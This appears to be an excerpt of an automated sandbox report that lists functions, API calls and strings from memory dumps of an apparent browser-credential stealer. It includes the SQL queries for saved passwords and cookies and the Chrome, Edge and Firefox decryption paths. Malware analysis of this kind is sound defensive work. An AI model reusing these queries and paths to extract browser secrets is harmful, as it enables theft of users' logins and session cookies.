Instruction Fuzzy Hash: 20319C31314FA181EF10CB21F8147693761FB95BD0F584625CAAE537A8DF3AD94ACB40

Function 0E625E5C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 109
memoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0E626500: CreateFileA.KERNEL32 ref: 0E62653B

StrStrIA.SHLWAPI ref: 0E625E9D
StrChrA.SHLWAPI ref: 0E625EBB
CryptUnprotectData.CRYPT32 ref: 0E625F2E
GetProcessHeap.KERNEL32 ref: 0E625F38
HeapAlloc.KERNEL32 ref: 0E625F4A
GetProcessHeap.KERNEL32 ref: 0E625F6A
HeapAlloc.KERNEL32 ref: 0E625F7C
LocalFree.KERNEL32 ref: 0E625FAF
GetProcessHeap.KERNEL32 ref: 0E625FB5
HeapFree.KERNEL32 ref: 0E625FC4

Strings

"encrypted_key":", xrefs: 0E625E96

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocFree$CreateCryptDataFileLocalUnprotect
String ID: "encrypted_key":"
API String ID: 3383461352-877455259
Opcode ID: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
Instruction ID: a44b8310c213054c6cf5137e173137d34a5162e153de2ada8b155e8b10936e65
Opcode Fuzzy Hash: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
Instruction Fuzzy Hash: E241BE32701BA09AEB209F61FC083AD67A1BB49B88F544439DE4F53B58EF39C845CB01

Function 03118424 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE

GetAdaptersInfo.IPHLPAPI ref: 03118470
GetAdaptersInfo.IPHLPAPI ref: 031184A7
wsprintfA.USER32 ref: 031184F0
wsprintfA.USER32 ref: 031185DB
wsprintfA.USER32 ref: 0311863F

Strings

o, xrefs: 03118482

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2074107575-252678980
Opcode ID: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
Instruction ID: db16e1ba143860a7bbef7357fbf1d78dc7a52ffe6c898fa0418830fe5f1fb707
Opcode Fuzzy Hash: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
Instruction Fuzzy Hash: 22A1EA76209B848BDB64CB14F48039AB7A4F78C784F444525EA8E83B68EF7CC664CB40

Function 0311900C Relevance: 7.6, APIs: 5, Instructions: 121networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 03119073
InternetCloseHandle.WININET ref: 03119242
InternetCloseHandle.WININET ref: 03119255

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: Internet$CloseHandle$Open
String ID:
API String ID: 2762225225-0
Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
Instruction ID: fbf71bacfc4ebdd58210de416c1594c45b8ab256c1a29031995a2396740926c3
Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
Instruction Fuzzy Hash: F051F376218B8087DBA0CB15F4A479EB7A0F3C9794F405125EB8A87B68DF7DC4A4CB40

Function 0E6216F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113filelibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0E62117C: GetSystemDirectoryW.KERNEL32 ref: 0E62119F

FindFirstFileW.KERNEL32 ref: 0E6217F0
FindNextFileW.KERNEL32 ref: 0E62182F
LoadLibraryW.KERNEL32 ref: 0E621840

Strings

\*.dll, xrefs: 0E62174D

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: FileFind$DirectoryFirstLibraryLoadNextSystem
String ID: \*.dll
API String ID: 834730945-3280006307
Opcode ID: 6866aee8e76eb0f359080723b639546054b0b6eac6c397268d38410719797fd9
Instruction ID: dfdbd7cbb9220e0444c77378ee5079393598eaa5abeb3f5e7b25c63c539c2f51
Opcode Fuzzy Hash: 6866aee8e76eb0f359080723b639546054b0b6eac6c397268d38410719797fd9
Instruction Fuzzy Hash: 8D41F23A71AF9091DB218F11F8943997364F3CABA4F544539CE5A17794EF39C946CB00

Function 03117274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI ref: 0311729C

Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE

GetAdaptersInfo.IPHLPAPI ref: 031172C7

Strings

o, xrefs: 031172A6

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2718687846-252678980
Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
Instruction ID: c2bc6c4f3bad3db11c867619fb95ba9d89b95b7491aab25456b4e511a9ca564c
Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
Instruction Fuzzy Hash: D001B076608B4486DB31DB15E49439EB7A0F3CC798F480225EA8D47B68DB7CC695CF04

Function 0311A8E0 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
Instruction ID: 663c61c9385de3ee59666f9786ca8e99cd986c93f149e1ef290935518b5a1c19
Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
Instruction Fuzzy Hash: 20311032119A85D7DB60DB24E48439AB764FB8C364F514336D6AE86AA8DF3CC1A4CB41

Function 0311B388 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0311B3BE

Strings

@, xrefs: 0311B39A

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
Instruction ID: 71312808f191cd8a2ce20bd5105696b45335d3ccac994376672d6b979472e997
Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
Instruction Fuzzy Hash: C9E0A5B6638A8482D6519F65E45474BB764F7887B8F805315BAA906BD8CBBCC118CB00

Function 0E62241C Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 0E62244B

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 546fafea68c79cb3a3cd112405f049519933be65302ff6dc45862b29a7b85276
Instruction ID: 30c9ea24826163849a5d7ccb9e7547fe9d01f94920388c99e77e2db83cd062fc
Opcode Fuzzy Hash: 546fafea68c79cb3a3cd112405f049519933be65302ff6dc45862b29a7b85276
Instruction Fuzzy Hash: FFF0FCB9711760C1EB04CF19E46532977A5F7C5BE0F548A2ADF39073A0CF78C4448A40

Function 0E62248C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtFreeVirtualMemory.NTDLL ref: 0E6224B2

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: FreeMemoryVirtual
String ID:
API String ID: 3963845541-0
Opcode ID: b85905049aa1bb23a04c8eb200cd99015da4847a7cb7b02ce48d47da5766ffda
Instruction ID: 236d84b25afeabed9fd914d2da871935725093a459fa7a9475678dcd15eb3b14
Opcode Fuzzy Hash: b85905049aa1bb23a04c8eb200cd99015da4847a7cb7b02ce48d47da5766ffda
Instruction Fuzzy Hash: E2D05EB6A22B8082EA089B55E8513987B60F754B74FC58705CA35033D0CF38C259CB50

Function 031182B4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtFreeVirtualMemory.NTDLL ref: 031182E5

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: FreeMemoryVirtual
String ID:
API String ID: 3963845541-0
Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
Instruction ID: 6731d97cd29f40b02a1c34d9d13d1a2a63b72b9149617660ac6a2957d3c5bf0e
Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
Instruction Fuzzy Hash: CCE0EC72508A8182D7219B60E40478AB760F3893B8F944315EAF812AE8CF7CC299CB04

Function 0311C704 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL ref: 0311C726

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
Instruction ID: a10e8db5a004a616b7d97459fd1841353832ff841b97b0aca113ad2494e15068
Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
Instruction Fuzzy Hash: 07D0C972A0868087CB299B28E44524EB7A4FB99344FD0462AEA8D457A8DA3CC665CF04

Function 0E62AC90 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64fdd4e0956b1b095ab47ecebdf404defda4e8b3512b96d1864ac4d0eb1feca6
Instruction ID: f15ff32480e1f28cdd22c209b12dba5e9e540a36f0b4af56a7ed00720e5f80ba
Opcode Fuzzy Hash: 64fdd4e0956b1b095ab47ecebdf404defda4e8b3512b96d1864ac4d0eb1feca6
Instruction Fuzzy Hash: D901752972099581EB14EFA1FC603A52396A7A0740F885C3D851D637F4FEB98D4ACB05

Function 0E623698 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 140
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0E62343C: SHGetValueA.SHLWAPI ref: 0E6234C7

LoadLibraryA.KERNEL32 ref: 0E6237CF
GetProcAddress.KERNEL32 ref: 0E623801
GetProcAddress.KERNEL32 ref: 0E62381C
GetProcAddress.KERNEL32 ref: 0E623837
GetProcAddress.KERNEL32 ref: 0E623852
GetProcAddress.KERNEL32 ref: 0E62386D
GetProcAddress.KERNEL32 ref: 0E623888
GetProcAddress.KERNEL32 ref: 0E6238A3

Part of subcall function 0E6241D0: std::_Xinvalid_argument.LIBCPMT ref: 0E624268

Strings

PK11_GetInternalKeySlot, xrefs: 0E62385F
PATH=, xrefs: 0E62373F
PK11_FreeSlot, xrefs: 0E62387A
NSS_Init, xrefs: 0E6237FA
PATH, xrefs: 0E6236BD, 0E6236D4
PK11SDR_Decrypt, xrefs: 0E623895
PR_Cleanup, xrefs: 0E623844
PL_ArenaFinish, xrefs: 0E623829
NSS_Shutdown, xrefs: 0E62380E
\nss3.dll, xrefs: 0E6237AE

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: AddressProc$LibraryLoadValueXinvalid_argumentstd::_
String ID: NSS_Init$NSS_Shutdown$PATH$PATH=$PK11SDR_Decrypt$PK11_FreeSlot$PK11_GetInternalKeySlot$PL_ArenaFinish$PR_Cleanup$\nss3.dll
API String ID: 2776111621-1994164264
Opcode ID: e1471d1c379bb25de04987baf5a2d89440bd472ccad988780434ce648a76cb4b
Instruction ID: 915b71aea7dfcac12e9ea117db2cb344979d8381e7b2251960cce8b938b38309
Opcode Fuzzy Hash: e1471d1c379bb25de04987baf5a2d89440bd472ccad988780434ce648a76cb4b
Instruction Fuzzy Hash: 9A614C75741FA195EB10DB60FCA439D33A1EB61798F80193AC90A677A4DF3A8949CB80

Function 0E627A88 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0E627708: GetTempPathA.KERNEL32 ref: 0E627727
Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E62773D
Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E627746
Part of subcall function 0E627708: wsprintfA.USER32 ref: 0E62788A
Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E6278A0
Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E6278AD

CopyFileA.KERNEL32 ref: 0E627AC0
GetLastError.KERNEL32 ref: 0E627ACA
GetLastError.KERNEL32 ref: 0E627AD5
GetProcessHeap.KERNEL32 ref: 0E627B31
HeapAlloc.KERNEL32 ref: 0E627B43
GetProcessHeap.KERNEL32 ref: 0E627BA2
HeapFree.KERNEL32 ref: 0E627BB0
GetProcessHeap.KERNEL32 ref: 0E627BB6
HeapFree.KERNEL32 ref: 0E627BC4
DeleteFileA.KERNEL32 ref: 0E627BDD

Strings

SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> '', xrefs: 0E627B82

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
String ID: SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> ''
API String ID: 1126038018-4010397166
Opcode ID: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
Instruction ID: 5b350435fecd011e1d4183c592d176eef5f0f48ebee4839165c608f1e697099a
Opcode Fuzzy Hash: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
Instruction Fuzzy Hash: 0A419432214BD196DB109F22F8587A967A1FB45BD0F54842ADE8A53B14DF39E549CB00

Function 0E625944 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0E627708: GetTempPathA.KERNEL32 ref: 0E627727
Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E62773D
Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E627746
Part of subcall function 0E627708: wsprintfA.USER32 ref: 0E62788A
Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E6278A0
Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E6278AD

CopyFileA.KERNEL32 ref: 0E62597C
GetLastError.KERNEL32 ref: 0E625986
GetLastError.KERNEL32 ref: 0E625991
GetProcessHeap.KERNEL32 ref: 0E6259ED
HeapAlloc.KERNEL32 ref: 0E6259FF
GetProcessHeap.KERNEL32 ref: 0E625A5E
HeapFree.KERNEL32 ref: 0E625A6C
GetProcessHeap.KERNEL32 ref: 0E625A72
HeapFree.KERNEL32 ref: 0E625A80
DeleteFileA.KERNEL32 ref: 0E625A99

Strings

select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h, xrefs: 0E625A3E

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
String ID: select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h
API String ID: 1126038018-1255454737
Opcode ID: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
Instruction ID: 0acba4bb7c6354bc25332417aeb3b904c1c1c2195caabb7b32313d333c8d8fa9
Opcode Fuzzy Hash: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
Instruction Fuzzy Hash: 4241B436214BC196EB20DF22F8583A96761FB86BC0F58842ADE8F57B14DF39D449CB01

Function 0E6B9958 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 0E6B997B

Part of subcall function 0E6B8EEC: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8F00

_get_daylight.LIBCMT ref: 0E6B998C

Part of subcall function 0E6B8E8C: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8EA0

_get_daylight.LIBCMT ref: 0E6B999D

Part of subcall function 0E6B8EBC: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8ED0

Part of subcall function 0E6B4ED0: HeapFree.KERNEL32 ref: 0E6B4EE6
Part of subcall function 0E6B4ED0: GetLastError.KERNEL32 ref: 0E6B4EF8

GetTimeZoneInformation.KERNEL32 ref: 0E6B99C4
WideCharToMultiByte.KERNEL32 ref: 0E6B9A5A
WideCharToMultiByte.KERNEL32 ref: 0E6B9AA6

Strings

?, xrefs: 0E6B9A99
Eastern Standard Time, xrefs: 0E6B9A2E
Eastern Summer Time, xrefs: 0E6B9A85

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
String ID: ?$Eastern Standard Time$Eastern Summer Time
API String ID: 500310315-688781733
Opcode ID: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
Instruction ID: 9b75b9bcb7847ee2eae5bbe39d755abf67d1c5c412b77116006a6b16d3210189
Opcode Fuzzy Hash: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
Instruction Fuzzy Hash: D251D732210790CAD760DF21F8907DA77A5F7897D8F94061AEB5E87B68DB38C881C750

Function 0311C860 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectW.WININET ref: 0311C8CC
HttpOpenRequestW.WININET ref: 0311C91E
InternetCloseHandle.WININET ref: 0311C9DA
InternetCloseHandle.WININET ref: 0311C9ED

Strings

GET, xrefs: 0311C912

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: Internet$CloseHandle$ConnectHttpOpenRequest
String ID: GET
API String ID: 830097650-1805413626
Opcode ID: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
Instruction ID: 415c915bb62bb4e3c6f737c79e92cd580264703eba84ece7972d6172cde3dd2e
Opcode Fuzzy Hash: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
Instruction Fuzzy Hash: BE41D172118A8486E720CB54F45879BBBA4F7C8798F101126E7CA82A68CFBDC598CF40

Function 0E627C00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32 ref: 0E627C3B
lstrcatA.KERNEL32 ref: 0E627C58
lstrlenA.KERNEL32 ref: 0E627C63
lstrcpyA.KERNEL32 ref: 0E627C83
lstrcpyA.KERNEL32 ref: 0E627C96
lstrcatA.KERNEL32 ref: 0E627CAB
lstrlenA.KERNEL32 ref: 0E627CB6
lstrcpyA.KERNEL32 ref: 0E627CCA

Strings

\User Data\Local State, xrefs: 0E627C9C

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: lstrcpy$lstrcatlstrlen$FolderPath
String ID: \User Data\Local State
API String ID: 2128322890-3114309041
Opcode ID: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
Instruction ID: 069df86d769a3ed219b183465883bb42dde95c672cb53c446c2c34cce2c64aa8
Opcode Fuzzy Hash: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
Instruction Fuzzy Hash: 62216F32324E8196DB10DB11FC58BA97361F794BC5F905426EA8F93B28DF39D509C740

Function 0E625ABC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32 ref: 0E625AF7
lstrcatA.KERNEL32 ref: 0E625B14
lstrlenA.KERNEL32 ref: 0E625B1F
lstrcpyA.KERNEL32 ref: 0E625B3F
lstrcpyA.KERNEL32 ref: 0E625B52
lstrcatA.KERNEL32 ref: 0E625B67
lstrlenA.KERNEL32 ref: 0E625B72
lstrcpyA.KERNEL32 ref: 0E625B87

Strings

\User Data\Local State, xrefs: 0E625B58

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: lstrcpy$lstrcatlstrlen$FolderPath
String ID: \User Data\Local State
API String ID: 2128322890-3114309041
Opcode ID: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
Instruction ID: 39dab14aad3627e2d7023f9a0e40b9e2b4d2b6ec49a813b8c5616e2355b3b722
Opcode Fuzzy Hash: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
Instruction Fuzzy Hash: 08314F32324E9196DB10DF11FC98BA97361F794B85F905426EA8F97B28DF39C90AC740

Function 0E626500 Relevance: 12.1, APIs: 8, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0E62653B
GetFileSize.KERNEL32 ref: 0E626556
CloseHandle.KERNEL32 ref: 0E6265E6

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 4ec1b03ebaae6b942048c776db554904a5bba1bda2e9f407a98509fe0087c89a
Instruction ID: db99fd453ceb0eadc70f3ab488e74d9cbb98e1ae876569a877c0eef864315a16
Opcode Fuzzy Hash: 4ec1b03ebaae6b942048c776db554904a5bba1bda2e9f407a98509fe0087c89a
Instruction Fuzzy Hash: 75319E32311F518AEB10CF26F80836D77A1BB99BD4F248529CB9A93759EF39D4468B40

Function 0311BB44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 0311BBB2
MapViewOfFile.KERNEL32 ref: 0311BBE5
VirtualFree.KERNEL32 ref: 0311BCF3
UnmapViewOfFile.KERNEL32 ref: 0311BD0B
CloseHandle.KERNEL32 ref: 0311BD16

Strings

@, xrefs: 0311BBCC

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
String ID: @
API String ID: 1610889594-2766056989
Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
Instruction ID: 5016cd2bde01d1e0f0bbf4149a479f3421eeb603811931d6c64dd3ed77b318fc
Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
Instruction Fuzzy Hash: 6C41D536229B8586DB60DB15E4807AAB3A4F7CCB94F409135EA8E47B68DF3CC564CB40

Function 0E62842C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32 ref: 0E62845F
lstrcatA.KERNEL32 ref: 0E62847C

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0E628470
formhistory.sqlite, xrefs: 0E6284AD
logins.json, xrefs: 0E6284DD

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: FolderPathlstrcat
String ID: \Mozilla\Firefox\Profiles\$formhistory.sqlite$logins.json
API String ID: 1210066190-636801707
Opcode ID: 2e3fdeca2198d4f2e1d5fefdc3b55a996d425bdbccd106553a4d9ac34f9653ec
Instruction ID: 258b6e2be2a1a6d3ed096851e6d4cbc2ae640fa206374bf76f9b31aee73b9f01
Opcode Fuzzy Hash: 2e3fdeca2198d4f2e1d5fefdc3b55a996d425bdbccd106553a4d9ac34f9653ec
Instruction Fuzzy Hash: 06315A36214F90D2EB649B25F85479A73A4F794384F84093AA98E53B68DF3DC849CB40

Function 0E625D94 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32 ref: 0E625DB6
SHGetFolderPathA.SHELL32 ref: 0E625E03
lstrcatA.KERNEL32 ref: 0E625E19

Part of subcall function 0E626604: lstrcpyA.KERNEL32 ref: 0E626633
Part of subcall function 0E626604: lstrlenA.KERNEL32 ref: 0E62663E
Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E626662
Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E626674
Part of subcall function 0E626604: FindFirstFileA.KERNEL32 ref: 0E626683
Part of subcall function 0E626604: lstrcpyA.KERNEL32 ref: 0E6266D2
Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E6266E8
Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E6266F7
Part of subcall function 0E626604: lstrcatA.KERNEL32 ref: 0E626709
Part of subcall function 0E626604: FindNextFileA.KERNEL32 ref: 0E62680B
Part of subcall function 0E626604: FindClose.KERNEL32 ref: 0E62681C

Strings

.cookie, xrefs: 0E625E40
\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe, xrefs: 0E625E0D
.txt, xrefs: 0E625DDC

